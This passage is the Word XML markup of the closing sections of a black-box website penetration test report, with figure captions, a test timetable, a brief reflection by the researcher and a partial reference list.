          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Invoice Created For </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber Ltd with Itemised Bill of Penetration Security Test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="322B843C" w14:textId="749CB2F7" w:rsidR="00057B06" w:rsidRDefault="00057B06" w:rsidP="00057B06">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>No hardware upgrades were recommended because the client utilises a CSP that maintains and operates the underlying datacentre infrastructure that the website is being hosted on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4148" w14:textId="1DED42E1" w:rsidR="00C5650F" w:rsidRDefault="00F876CA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc40134063"/>
      <w:r>
        <w:t>8.0 Timetable</w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve"> of Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="2B9C4149" w14:textId="19D6DD2D" w:rsidR="00C5650F" w:rsidRDefault="00057B06" w:rsidP="00AC7E05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A timetable of execution was prepared for the client, so that log files </w:t>
      </w:r>
      <w:r w:rsidR="00AC7E05">
        <w:t>regarding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00AC7E05">
        <w:t xml:space="preserve"> Black-Box’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> penetration test can be deleted</w:t>
      </w:r>
      <w:r w:rsidR="00AC7E05">
        <w:t xml:space="preserve"> and marked as safe along with the timeline of progress of when the penetration test was taking place. The timetable of execution depicting this can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00AC7E05" w:rsidRPr="00E77759">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CE2A98" w14:textId="77777777" w:rsidR="00E77759" w:rsidRDefault="000C52AA" w:rsidP="00E77759">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41854787" wp14:editId="500B07D9">
            <wp:extent cx="5723255" cy="5113655"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="1079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3255" cy="5113655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="501270A4" w14:textId="4A0C1BA9" w:rsidR="00AC7E05" w:rsidRPr="00E77759" w:rsidRDefault="00E77759" w:rsidP="00E77759">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc40134090"/>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Detailed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ghant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E77759">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chart Outlining Timeline of the Black Box Penetration Test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="195A95CB" w14:textId="192CB485" w:rsidR="00646437" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc40134064"/>
      <w:r>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00646437">
        <w:t xml:space="preserve">Reflection of </w:t>
      </w:r>
      <w:r w:rsidR="00BA78EF">
        <w:t xml:space="preserve">‘Black Box’ Penetration Testing </w:t>
      </w:r>
      <w:r w:rsidR="00646437">
        <w:t>Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="19A4B0B5" w14:textId="17038982" w:rsidR="008B45A6" w:rsidRDefault="008B45A6" w:rsidP="008B45A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The researcher of this project </w:t>
      </w:r>
      <w:r w:rsidR="003210F9">
        <w:t xml:space="preserve">Mr Paul M Lawrence </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a network infrastructure engineer and Linux/Windows systems engineer whom understands security concepts relating to </w:t>
      </w:r>
      <w:r w:rsidR="002312EB">
        <w:t>network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> infrastructure within a Local Area Network (LAN)</w:t>
      </w:r>
      <w:r w:rsidR="003210F9">
        <w:t xml:space="preserve"> and Wide Area Network (WAN). T</w:t>
      </w:r>
      <w:r>
        <w:t>his project has allowed the researcher to broaden their breadth of knowledge within website and relationship database  development, thus having to learn and understand the PHP, Java</w:t>
      </w:r>
      <w:r w:rsidR="002312EB">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL and HTML </w:t>
      </w:r>
      <w:r w:rsidR="00EF7CC4">
        <w:t xml:space="preserve">website scripting </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> languages that are crucial to finding vulnerabilities within the source code and design architecture of a website in order to exploit the weaknesses</w:t>
      </w:r>
      <w:r w:rsidR="003210F9">
        <w:t xml:space="preserve">. This project has </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C414A" w14:textId="469BC4C1" w:rsidR="00C5650F" w:rsidRDefault="00646437">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc40134065"/>
      <w:r>
        <w:t xml:space="preserve">10.0 </w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="7DBD007A" w14:textId="69D353D8" w:rsidR="009B0288" w:rsidRDefault="009B0288" w:rsidP="009B0288">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">ADDIN Mendeley Bibliography CSL_BIBLIOGRAPHY </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009B0288">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bibliography</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C84F1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t xml:space="preserve">S. Mehta, G. Raj, and D. Singh, “Penetration testing as a test phase in web service testing a black box pen testing approach,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Smart Innovation, Systems and Technologies</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10.1007/978-981-10-5547-8_64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90030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t xml:space="preserve">Q. Gu and P. Liu, “Denial of Service Attacks,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Handbook of Computer Networks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, vol. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3, 2012, pp. 454–468.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1B25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t xml:space="preserve">R. Hawkes and R. Hawkes, “Introducing HTML5,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Foundation HTML5 Canvas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB351F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t xml:space="preserve">Microsoft Azure, “What is a Cloud Service Provider – Definition | Microsoft Azure,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>azure.microsoft.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019. [Online]. Available: https://azure.microsoft.com/en-gb/overview/what-is-a-cloud-provider/. [Accessed: 30-Apr-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5BC6D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t>ciscopress.com, “LANs, WANs, and the Internet (1.3) &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; Exploring the Modern Computer Network: Types, Functions, and Hardware,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ciscopress.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2013. [Online]. Available: http://www.ciscopress.com/articles/article.asp?p=2158215&amp;seqNum=6. [Accessed: 02-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8381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t xml:space="preserve">D. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Beimborn</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Miletzki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and S. Wenzel, “Platform as a service (PaaS),” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bus. Inf. Syst. Eng.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, vol. 3, no. 6, pp. 381–384, 2011,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10.1007/s12599-011-0183-3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBBB7B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t xml:space="preserve">M. Mark, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REST API Design Rulebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83FBF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t xml:space="preserve">G. Bora, S. Bora, S. Singh, and S. M. Arsalan, “OSI Reference Model: An Overview,”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Trends Technol.</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10.14445/22312803/ijctt-v7p151.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166F33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rPr>
        <w:tab/>
        <w:t xml:space="preserve">Broadcom, “SAN Design and Best Practices (1857 KB),” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>broadcom.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. [Online]. Available: https://docs.broadcom.com/docs/12380347. [Accessed: 22-Jan-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058CC0A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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ZoneAlarm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SEcurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “What Is the Difference between Hardware and Software Firewalls? |Firewall Internet Security Tips,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zonealarm.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014. [Online]. Available: http://www.zonealarm.com/firewall-blog/blog/difference-hardware-software-firewalls/. [Accessed: 11-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C760F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t xml:space="preserve">Cisco, “Data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Architecture Overview - Cisco,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cisco.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2008. [Online]. Available: https://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Data_Center/DC_Infra2_5/DCInfra_1.html. [Accessed: 30-Apr-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DFDA9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t xml:space="preserve">A. Kumar and A. Kumar, “Hypertext Transfer Protocol (HTTP),” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web Technology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D0C9A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Gurturk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Building </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Serverless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Architectures,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Building Serverless Architectures: Learn the intricacies and nuances of building efficient serverless architectures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D5423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t xml:space="preserve">J. Keith, “HTML5 for web designers,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2010,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10.1016/j.ijhcs.2006.06.002.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14593D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[15]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Amazon, “Amazon Dynamo DB,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sosp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2007,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10.1145/1323293.1294281.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA964B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[16]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">AWS, “Best Practices for Working with AWS Lambda Functions - AWS Lambda,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docs.aws.amazon.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2020. [Online]. Available: https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html. [Accessed: 11-May-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0388D1F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lastRenderedPageBreak/>
        <w:t>[17]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lekies</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Kotowicz</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Groß</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, E. A. Vela Nava, and M. Johns, “Code-Reuse Attacks for the Web,”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10.1145/3133956.3134091.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EBA74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[18]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">I. D. Craig, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Virtual machines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2006.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D31A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[19]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aleksic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
